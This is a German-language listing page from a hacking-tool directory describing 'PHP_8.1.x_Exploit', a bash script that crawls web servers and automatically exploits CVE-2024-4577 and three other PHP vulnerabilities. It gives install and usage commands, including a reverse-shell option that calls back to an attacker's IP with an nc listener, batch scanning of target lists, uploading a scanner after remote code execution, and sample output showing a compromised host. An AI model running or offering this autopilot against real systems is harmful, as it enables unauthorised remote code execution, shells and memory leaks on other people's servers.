Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PHP_8.1.x_Exploit — Automatisierte Erkennung und Ausnutzung kritischer PHP-Sicherheitslücken (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
Tools/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
AufklärungSchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsCommand and ControlCrawlerRemote-Access-Tool
GitHub
114vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
gl1tch0x1/php_8.1.x_exploit

PHP_8.1.x_Exploit

Automatisierte Erkennung und Ausnutzung kritischer PHP-Sicherheitslücken (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Repository anzeigen
Teilen

🚀 PHP CVE Autopilot

Automatisierte Erkennung und Ausnutzung kritischer PHP-Sicherheitslücken (CVE-2024-4577-Bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh ist ein einziges, null‑konfigurations Sicherheitsbewertungswerkzeug, das automatisch verwundbare PHP-Endpunkte entdeckt und vier hochwirksame CVEs ausnutzt, die PHP-Versionen vor 8.1.34 (veröffentlicht Dezember 2024) betreffen. Es erfordert kein manuelles Erstellen von Payloads – geben Sie einfach eine URL an und das Skript erledigt den Rest, vom Crawling bis zur Remote-Code-Ausführung. Vollautomatischer Autopilot – erkennt und exploitiert automatisch ohne Benutzereingaben.

Funktionen

  • Vollautonomer Autopilot – gibt eine einzelne URL vor, crawlt, erstellt Fingerabdrücke, testet und exploitiert ohne Benutzereingriff.
  • Batch-Scanning – geben Sie eine Liste von Zielen ein und führen Sie sie parallel aus.
  • Fortschrittliches Crawling – extrahiert Links und Formulare von der Startseite für eine bessere Erkennung.
  • Betriebssystem- und PHP-Version-Fingerprinting – vermeidet Windows-spezifische Angriffe auf Linux, prüft die PHP-Version.
  • CVE-2024-4577-Bypass (Windows-CGI-Argumentinjektion)
    • Erkennt und exploitiert verwundbare PHP-CGI-Endpunkte.
    • Reverse Shell (PowerShell One‑Liner) optional.
    • Zwei Injektionsvarianten: Standard -d und Soft‑Hyphen %AD Bypass.
  • CVE-2025-14177 – Heap‑Speicherleck über getimagesize()
    • Erstellt dynamisch ein fehlerhaftes JPEG und sendet es automatisch an jeden entdeckten Upload‑Endpunkt.
    • Erkennt durchgesickerten Speicher in Antworten.
  • Tiefer lokaler Scan via RCE (wenn CVE-2024-4577 ausgenutzt wurde)
    • Lädt einen leichten PHP‑Scanner hoch, der testet auf:
      • CVE-2025-14180 – NULL‑Zeiger‑Dereferenzierung in PDO PostgreSQL.
      • CVE-2025-14178 – Integer‑Überlauf in array_merge.
  • Intelligentes Crawling – extrahiert Links und Formulare, um CGI‑Skripte und Upload‑Seiten zu entdecken.
  • Parallele Ausführung – verwendet parallel falls verfügbar, fällt ansonsten zurück.
  • Ausführliche & Debug‑Modi – sehen Sie jede HTTP‑Anfrage und Entscheidung.
  • Berichtserstellung – speichert alle Ergebnisse in einer Textdatei.
  • Bereinigt & sicher – temporäre Dateien werden beim Beenden gelöscht, Timeouts verhindern Hängenbleiben.

Voraussetzungen

AbhängigkeitZweckNormalerweise installiert?
bash 4.0+Skript‑InterpreterJa (Linux/macOS)
curlHTTP‑AnfragenJa
grep, sed, awkTextverarbeitungJa
mktempErstellung temporärer DateienJa
(optional) parallelSchnelleres Batch‑ScannenNein (aber empfohlen)
(optional) jqJSON‑AusgabeformatierungNein

Keine Root‑Rechte erforderlich – das Tool sendet nur HTTP‑Anfragen und führt optional eine Reverse Shell aus (erfordert einen Listener auf Ihrem Rechner).

Installation

git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

Verwendung

Einzelnes Ziel (am häufigsten)

./PHP8.1.x_Exploit.sh -u http://target.example.com

Einzelnes Ziel mit Reverse Shell (CVE-2024-4577)

./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

Dann auf Ihrem Rechner:

nc -lvnp 4444

Batch‑Scan mehrerer Ziele

./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

Beispiel targets.txt:

http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

Nur‑Scan‑Modus (keine Exploit‑Versuche)

./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

Bericht in Datei speichern

./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

Ausführliche / Debug‑Ausgabe

./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # sehr detailreich

So funktioniert's (Phasen)

PhaseAktion
1Fingerprinting – Betriebssystem‑ und PHP‑Version aus Headern und Sonden.
2Crawling – extrahiert href‑ und action‑Attribute von der Startseite.
3CGI‑Erkennung – probiert gängige Pfade und gecrawlte Links, die wie CGI aussehen.
4CVE‑2024‑4577‑Test – injiziert sowohl -d als auch %AD Payloads; bei Erfolg führt es Befehle aus oder sendet eine Reverse Shell.
5Upload‑Endpunkt‑Erkennung – prüft gängige Upload‑Pfade und alle Formulare, die „upload“/„image“ enthalten.
6CVE‑2025‑14177‑Test – erstellt ein fehlerhaftes JPEG, sendet es per POST an jeden Upload‑Endpunkt, erkennt Heap‑Lecks.
7Tiefer interner Scan – falls RCE erreicht wird, lädt ein Scanner‑PHP‑Skript hoch und führt es aus, um CVE‑2025‑14180 / CVE‑2025‑14178 zu testen.
8Berichterstattung – gibt eine Zusammenfassung aus und schreibt optional in eine Datei.

Befehlszeilenoptionen (vollständige Referenz)

OptionBeschreibung
-u URLURL eines einzelnen Ziels (z. B. http://example.com/)
-l DATEIBatch‑Datei mit einer URL pro Zeile
--scan-onlyNur erkennen – nicht exploitieren (keine Reverse Shell, keine Payload‑Uploads)
-o DATEISchreibe Endbericht in DATEI
--threads NAnzahl paralleler Threads für Batch‑Scan (Standard: 5)
--timeout NHTTP‑Timeout in Sekunden (Standard: 10)
--no-colorFarbausgabe deaktivieren
--verboseDetaillierten Fortschritt anzeigen
--debugJede HTTP‑Anfrage anzeigen (kann sensible Daten offenlegen)
--revshell IP PORTVersuche Reverse Shell, wenn CVE‑2024‑4577 gefunden wird
-h, --helpHilfe anzeigen und beenden

CVEs im Detail

CVESchweregradAuswirkungExploit‑VektorBehoben in
CVE‑2024‑4577 (Bypass)KritischRCEWindows‑CGI‑Argumentinjektion (Soft‑Hyphen‑Mapping)PHP 8.1.34
CVE‑2025‑14177Mittel/HochInfo‑Leck (Heap‑Speicher)Fehlerhaftes JPEG, an getimagesize() übergebenPHP 8.1.34
CVE‑2025‑14180HochDoS (NULL‑Dereferenzierung)PDO PostgreSQL mit emulierten Prepares + fehlerhaftem Parameter \x99PHP 8.1.34
CVE‑2025‑14178Hoch (8.2)DoS / mögliche Speicherkorruptionarray_merge() mit riesigen Arrays führt zu Integer‑ÜberlaufPHP 8.1.34

Hinweis: CVE‑2025‑14180 und CVE‑2025‑14178 können nur von innerhalb des Servers (lokale Tests) genau erkannt werden. Das Skript erreicht dies, indem es nach einem erfolgreichen CGI‑Exploit einen Scanner hochlädt.

📸 Beispielausgabe

[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)
Tool herunterladen